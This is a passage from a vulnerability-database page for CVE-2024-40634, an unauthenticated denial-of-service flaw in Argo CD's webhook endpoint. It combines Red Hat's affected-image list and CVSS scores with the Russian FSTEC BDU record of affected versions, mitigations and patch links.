"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4972"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "argocd: Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint in Argo CD"
}
]
}
BDU:2024-05674
Vulnerability from fstec - Published: 22.07.2024{
"CVSS 2.0": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"CVSS 3.0": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"CVSS 4.0": null,
"remediation_\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": null,
"remediation_\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435": null,
"\u0412\u0435\u043d\u0434\u043e\u0440 \u041f\u041e": "The Linux Foundation",
"\u0412\u0435\u0440\u0441\u0438\u044f \u041f\u041e": "\u0434\u043e 2.9.20 (Argo CD), \u043e\u0442 2.10.0 \u0434\u043e 2.10.15 (Argo CD), \u043e\u0442 2.11.0 \u0434\u043e 2.11.6 (Argo CD)",
"\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e": "\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u0438\u0437 \u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0445 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u0432.\n\u0412 \u0441\u0432\u044f\u0437\u0438 \u0441\u043e \u0441\u043b\u043e\u0436\u0438\u0432\u0448\u0435\u0439\u0441\u044f \u043e\u0431\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u043e\u0439 \u0438 \u0432\u0432\u0435\u0434\u0435\u043d\u043d\u044b\u043c\u0438 \u0441\u0430\u043d\u043a\u0446\u0438\u044f\u043c\u0438 \u043f\u0440\u043e\u0442\u0438\u0432 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0441\u043b\u0435 \u043e\u0446\u0435\u043d\u043a\u0438 \u0432\u0441\u0435\u0445 \u0441\u043e\u043f\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0445 \u0440\u0438\u0441\u043a\u043e\u0432.\n\n\u041a\u043e\u043c\u043f\u0435\u043d\u0441\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u043c\u0435\u0440\u044b:\n- \u0432\u0432\u0435\u0434\u0435\u043d\u0438\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f \u043d\u0430 \u0440\u0430\u0437\u043c\u0435\u0440 \u0432\u0445\u043e\u0434\u044f\u0449\u0438\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u043d\u0430 \u0443\u0440\u043e\u0432\u043d\u0435 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0438\u043b\u0438 \u043f\u0440\u043e\u043a\u0441\u0438-\u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442 \u0437\u0430\u043f\u0440\u043e\u0441\u044b \u0434\u043b\u044f Argo CD;\n- \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u043b\u0438\u043c\u0438\u0442\u0430 \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432 \u0434\u043b\u044f pod\u0027\u043e\u0432 Argo CD \u0432 \u043c\u0430\u043d\u0438\u0444\u0435\u0441\u0442\u0430\u0445 Kubernetes \u0441 \u0446\u0435\u043b\u044c\u044e \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f \u0432\u043b\u0438\u044f\u043d\u0438\u044f \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0435 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u044b \u043a\u043b\u0430\u0441\u0442\u0435\u0440\u0430;\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u044d\u043a\u0440\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u0440\u043e\u0432\u043d\u044f \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0434\u043b\u044f \u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u0438 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432;\n- \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043a\u043b\u0430\u0441\u0442\u0435\u0440\u0443 \u0438\u0437 \u0432\u043d\u0435\u0448\u043d\u0438\u0445 \u0441\u0435\u0442\u0435\u0439 (\u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442);\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u0447\u0430\u0441\u0442\u043d\u044b\u0445 \u0441\u0435\u0442\u0435\u0439 \u0434\u043b\u044f \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 (VPN).\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044f:\nhttps://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc\t\nhttps://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36\t\nhttps://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df\t\nhttps://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w",
"\u0414\u0430\u0442\u0430 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f": "22.07.2024",
"\u0414\u0430\u0442\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f": "24.07.2024",
"\u0414\u0430\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438": "24.07.2024",
"\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": "BDU:2024-05674",
"\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "CVE-2024-40634",
"\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430",
"\u041a\u043b\u0430\u0441\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u043e\u0434\u0430",
"\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u041f\u041e": "Argo CD",
"\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u041e\u0421 \u0438 \u0442\u0438\u043f \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b": null,
"\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0435\u043a\u043b\u0430\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0433\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u043d\u0435\u043f\u0440\u0435\u0440\u044b\u0432\u043d\u043e\u0439 \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 GitOps \u0434\u043b\u044f Kubernetes Argo CD, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438",
"\u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430": "\u0421\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u0435",
"\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "\u041d\u0435\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u044b\u0439 \u0440\u0430\u0441\u0445\u043e\u0434 \u0440\u0435\u0441\u0443\u0440\u0441\u0430 (\u00ab\u0418\u0441\u0442\u043e\u0449\u0435\u043d\u0438\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u0430\u00bb) (CWE-400)",
"\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0435\u043a\u043b\u0430\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0433\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u043d\u0435\u043f\u0440\u0435\u0440\u044b\u0432\u043d\u043e\u0439 \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 GitOps \u0434\u043b\u044f Kubernetes Argo CD \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u044b\u043c \u0440\u0430\u0441\u0445\u043e\u0434\u043e\u043c \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438, \u043f\u0443\u0442\u0435\u043c \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 JSON \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u0443\u044e \u0442\u043e\u0447\u043a\u0443 /api/webhook",
"\u041f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": null,
"\u041f\u0440\u043e\u0447\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f": null,
"\u0421\u0432\u044f\u0437\u044c \u0441 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430\u043c\u0438 \u0418\u0411": "\u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u044e\u0442\u0441\u044f",
"\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430",
"\u0421\u043f\u043e\u0441\u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f": "\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
"\u0421\u043f\u043e\u0441\u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438": "\u0418\u0441\u0447\u0435\u0440\u043f\u0430\u043d\u0438\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432",
"\u0421\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438": "https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc\t\nhttps://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36\t\nhttps://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df\t\nhttps://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w",
"\u0421\u0442\u0430\u0442\u0443\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u043c",
"\u0422\u0438\u043f \u041f\u041e": "\u041f\u0440\u0438\u043a\u043b\u0430\u0434\u043d\u043e\u0435 \u041f\u041e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c",
"\u0422\u0438\u043f \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "CWE-400",
"\u0423\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0412\u044b\u0441\u043e\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 2.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 7,8)\n\u0412\u044b\u0441\u043e\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 3.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 7,5)"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.